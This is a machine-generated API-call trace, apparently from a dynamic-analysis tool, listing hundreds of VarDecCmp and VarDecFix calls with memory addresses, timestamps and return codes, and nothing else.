VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.567] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.567] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.567] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.568] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c598, pdecRight=0x1b83c588) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c558, pdecRight=0x1b83c548) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c538, pdecRight=0x1b83c528) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.568] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.568] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.568] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.568] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x1 [0266.568] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.568] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.569] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.569] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.569] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.569] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.569] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.569] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.569] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.569] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.569] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.569] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.569] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.569] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.569] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.569] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.569] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.569] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.571] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.571] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.571] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.571] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.571] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.571] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.571] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.571] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.572] VarDecCmp (pdecLeft=0x1b83c3e8, pdecRight=0x1b83c3d8) returned 0x0 [0266.572] VarDecCmp (pdecLeft=0x1b83c3c8, pdecRight=0x1b83c3b8) returned 0x2 [0266.572] VarDecCmp (pdecLeft=0x1b83c570, pdecRight=0x1b83c560) returned 0x2 [0266.572] VarDecCmp (pdecLeft=0x1b83c550, pdecRight=0x1b83c540) returned 0x0 [0266.572] VarDecCmp (pdecLeft=0x1b83c3e8, pdecRight=0x1b83c3d8) returned 0x0 [0266.572] VarDecCmp (pdecLeft=0x1b83c3c8, pdecRight=0x1b83c3b8) returned 0x2 [0266.572] VarDecCmp (pdecLeft=0x1b83c570, pdecRight=0x1b83c560) returned 0x2 [0266.572] VarDecCmp (pdecLeft=0x1b83c550, pdecRight=0x1b83c540) returned 0x0 [0266.574] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.574] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.574] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.574] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.574] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.574] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.574] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.574] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.574] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.574] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.574] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.574] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.574] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.574] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.574] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.574] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.574] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.575] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.575] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.575] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.577] VarDecCmp (pdecLeft=0x1b83c818, pdecRight=0x1b83c808) returned 0x2 [0266.577] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x2 [0266.577] VarDecFix (in: pdecIn=0x1b83c6d8, pdecResult=0x1b83c660 | out: pdecResult=0x1b83c660) returned 0x0 [0266.577] VarDecCmp (pdecLeft=0x1b83c6c8, pdecRight=0x1b83c6b8) returned 0x1 [0266.577] VarDecCmp (pdecLeft=0x1b83c6f0, pdecRight=0x1b83c6e0) returned 0x2 [0266.577] VarDecFix (in: pdecIn=0x1b83c6d0, pdecResult=0x1b83c640 | out: pdecResult=0x1b83c640) returned 0x0 [0266.577] VarDecCmp (pdecLeft=0x1b83c6c0, pdecRight=0x1b83c6b0) returned 0x1 [0266.577] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.577] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.577] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.577] VarDecCmp (pdecLeft=0x1b83c898, pdecRight=0x1b83c888) returned 0x2 [0266.577] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.577] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.577] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.577] VarDecCmp (pdecLeft=0x1b83c708, pdecRight=0x1b83c6f8) returned 0x1 [0266.577] VarDecCmp (pdecLeft=0x1b83c6e8, pdecRight=0x1b83c6d8) returned 0x1 [0266.578] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x0 [0266.578] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x2 [0266.578] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.578] VarDecCmp (pdecLeft=0x1b83c5e0, pdecRight=0x1b83c5d0) returned 0x0 [0266.578] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x0 [0266.578] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x2 [0266.578] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.578] VarDecCmp (pdecLeft=0x1b83c5e0, pdecRight=0x1b83c5d0) returned 0x0 [0266.579] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x2 [0266.579] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x2 [0266.579] VarDecFix (in: pdecIn=0x1b83c808, pdecResult=0x1b83c790 | out: pdecResult=0x1b83c790) returned 0x0 [0266.579] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x1 [0266.579] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x2 [0266.579] VarDecFix (in: pdecIn=0x1b83c800, pdecResult=0x1b83c770 | out: pdecResult=0x1b83c770) returned 0x0 [0266.579] VarDecCmp (pdecLeft=0x1b83c7f0, pdecRight=0x1b83c7e0) returned 0x1 [0266.579] VarDecCmp (pdecLeft=0x1b83c7d0, pdecRight=0x1b83c7c0) returned 0x2 [0266.579] VarDecCmp (pdecLeft=0x1b83c808, pdecRight=0x1b83c7f8) returned 0x2 [0266.579] VarDecCmp (pdecLeft=0x1b83c918, pdecRight=0x1b83c908) returned 0x0 [0266.579] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x2 [0266.579] VarDecCmp (pdecLeft=0x1b83c7b8, pdecRight=0x1b83c7a8) returned 0x2 [0266.579] VarDecFix (in: pdecIn=0x1b83c798, pdecResult=0x1b83c720 | out: pdecResult=0x1b83c720) returned 0x0 [0266.579] VarDecCmp (pdecLeft=0x1b83c788, pdecRight=0x1b83c778) returned 0x1 [0266.579] VarDecCmp (pdecLeft=0x1b83c7b0, pdecRight=0x1b83c7a0) returned 0x2 [0266.579] VarDecFix (in: pdecIn=0x1b83c790, pdecResult=0x1b83c700 | out: pdecResult=0x1b83c700) returned 0x0 [0266.579] VarDecCmp (pdecLeft=0x1b83c780, pdecRight=0x1b83c770) returned 0x1 [0266.579] VarDecCmp (pdecLeft=0x1b83c760, pdecRight=0x1b83c750) returned 0x2 [0266.579] VarDecCmp (pdecLeft=0x1b83c768, pdecRight=0x1b83c758) returned 0x2 [0266.579] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.579] VarDecFix (in: pdecIn=0x1b83c628, pdecResult=0x1b83c5b0 | out: pdecResult=0x1b83c5b0) returned 0x0 [0266.579] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c640, pdecRight=0x1b83c630) returned 0x2 [0266.580] VarDecFix (in: pdecIn=0x1b83c620, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c610, pdecRight=0x1b83c600) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x2 [0266.580] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.580] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c8a8, pdecRight=0x1b83c898) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c768, pdecRight=0x1b83c758) returned 0x2 [0266.580] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.580] VarDecFix (in: pdecIn=0x1b83c628, pdecResult=0x1b83c5b0 | out: pdecResult=0x1b83c5b0) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c640, pdecRight=0x1b83c630) returned 0x2 [0266.580] VarDecFix (in: pdecIn=0x1b83c620, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c610, pdecRight=0x1b83c600) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x2 [0266.580] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.580] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c8a8, pdecRight=0x1b83c898) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c958, pdecRight=0x1b83c948) returned 0x2 [0266.580] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.580] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.580] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.581] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x2 [0266.581] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x2 [0266.581] VarDecFix (in: pdecIn=0x1b83c808, pdecResult=0x1b83c790 | out: pdecResult=0x1b83c790) returned 0x0 [0266.581] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x1 [0266.581] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x2 [0266.581] VarDecFix (in: pdecIn=0x1b83c800, pdecResult=0x1b83c770 | out: pdecResult=0x1b83c770) returned 0x0 [0266.581] VarDecCmp (pdecLeft=0x1b83c7f0, pdecRight=0x1b83c7e0) returned 0x1 [0266.581] VarDecCmp (pdecLeft=0x1b83c7d0, pdecRight=0x1b83c7c0) returned 0x2 [0266.581] VarDecCmp (pdecLeft=0x1b83c808, pdecRight=0x1b83c7f8) returned 0x2 [0266.581] VarDecCmp (pdecLeft=0x1b83c918, pdecRight=0x1b83c908) returned 0x0 [0266.581] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x2 [0266.581] VarDecCmp (pdecLeft=0x1b83c7b8, pdecRight=0x1b83c7a8) returned 0x2 [0266.581] VarDecFix (in: pdecIn=0x1b83c798, pdecResult=0x1b83c720 | out: pdecResult=0x1b83c720) returned 0x0 [0266.581] VarDecCmp (pdecLeft=0x1b83c788, pdecRight=0x1b83c778) returned 0x1 [0266.581] VarDecCmp (pdecLeft=0x1b83c7b0, pdecRight=0x1b83c7a0) returned 0x2 [0266.581] VarDecFix (in: pdecIn=0x1b83c790, pdecResult=0x1b83c700 | out: pdecResult=0x1b83c700) returned 0x0 [0266.581] VarDecCmp (pdecLeft=0x1b83c780, pdecRight=0x1b83c770) returned 0x1 [0266.581] VarDecCmp (pdecLeft=0x1b83c760, pdecRight=0x1b83c750) returned 0x2 [0266.581] VarDecCmp (pdecLeft=0x1b83c768, pdecRight=0x1b83c758) returned 0x2 [0266.581] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.581] VarDecFix (in: pdecIn=0x1b83c628, pdecResult=0x1b83c5b0 | out: pdecResult=0x1b83c5b0) returned 0x0 [0266.581] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c640, pdecRight=0x1b83c630) returned 0x2 [0266.582] VarDecFix (in: pdecIn=0x1b83c620, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c610, pdecRight=0x1b83c600) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x2 [0266.582] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.582] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c8a8, pdecRight=0x1b83c898) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c768, pdecRight=0x1b83c758) returned 0x2 [0266.582] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.582] VarDecFix (in: pdecIn=0x1b83c628, pdecResult=0x1b83c5b0 | out: pdecResult=0x1b83c5b0) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c640, pdecRight=0x1b83c630) returned 0x2 [0266.582] VarDecFix (in: pdecIn=0x1b83c620, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c610, pdecRight=0x1b83c600) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x2 [0266.582] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.582] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c8a8, pdecRight=0x1b83c898) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c958, pdecRight=0x1b83c948) returned 0x2 [0266.582] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.582] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.582] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c818, pdecRight=0x1b83c808) returned 0x2 [0266.583] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x2 [0266.583] VarDecFix (in: pdecIn=0x1b83c6d8, pdecResult=0x1b83c660 | out: pdecResult=0x1b83c660) returned 0x0 [0266.583] VarDecCmp (pdecLeft=0x1b83c6c8, pdecRight=0x1b83c6b8) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c6f0, pdecRight=0x1b83c6e0) returned 0x2 [0266.583] VarDecFix (in: pdecIn=0x1b83c6d0, pdecResult=0x1b83c640 | out: pdecResult=0x1b83c640) returned 0x0 [0266.583] VarDecCmp (pdecLeft=0x1b83c6c0, pdecRight=0x1b83c6b0) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.583] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.583] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c7c8, pdecRight=0x1b83c7b8) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c898, pdecRight=0x1b83c888) returned 0x2 [0266.583] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c498, pdecRight=0x1b83c488) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c708, pdecRight=0x1b83c6f8) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c6e8, pdecRight=0x1b83c6d8) returned 0x1 [0266.583] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x2 [0266.583] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x2 [0266.584] VarDecFix (in: pdecIn=0x1b83c808, pdecResult=0x1b83c790 | out: pdecResult=0x1b83c790) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x2 [0266.584] VarDecFix (in: pdecIn=0x1b83c800, pdecResult=0x1b83c770 | out: pdecResult=0x1b83c770) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c7f0, pdecRight=0x1b83c7e0) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c7d0, pdecRight=0x1b83c7c0) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c808, pdecRight=0x1b83c7f8) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c918, pdecRight=0x1b83c908) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c808, pdecRight=0x1b83c7f8) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c918, pdecRight=0x1b83c908) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c7b8, pdecRight=0x1b83c7a8) returned 0x2 [0266.584] VarDecFix (in: pdecIn=0x1b83c798, pdecResult=0x1b83c720 | out: pdecResult=0x1b83c720) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c788, pdecRight=0x1b83c778) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c7b0, pdecRight=0x1b83c7a0) returned 0x2 [0266.584] VarDecFix (in: pdecIn=0x1b83c790, pdecResult=0x1b83c700 | out: pdecResult=0x1b83c700) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c780, pdecRight=0x1b83c770) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c760, pdecRight=0x1b83c750) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c768, pdecRight=0x1b83c758) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.584] VarDecFix (in: pdecIn=0x1b83c628, pdecResult=0x1b83c5b0 | out: pdecResult=0x1b83c5b0) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c640, pdecRight=0x1b83c630) returned 0x2 [0266.584] VarDecFix (in: pdecIn=0x1b83c620, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c610, pdecRight=0x1b83c600) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c718, pdecRight=0x1b83c708) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c8a8, pdecRight=0x1b83c898) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c888, pdecRight=0x1b83c878) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c768, pdecRight=0x1b83c758) returned 0x2 [0266.584] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.584] VarDecFix (in: pdecIn=0x1b83c628, pdecResult=0x1b83c5b0 | out: pdecResult=0x1b83c5b0) returned 0x0 [0266.584] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.584] VarDecCmp (pdecLeft=0x1b83c640, pdecRight=0x1b83c630) returned 0x2 [0266.585] VarDecFix (in: pdecIn=0x1b83c620, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.585] VarDecCmp (pdecLeft=0x1b83c610, pdecRight=0x1b83c600) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x2 [0266.585] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.585] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x0 [0266.585] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 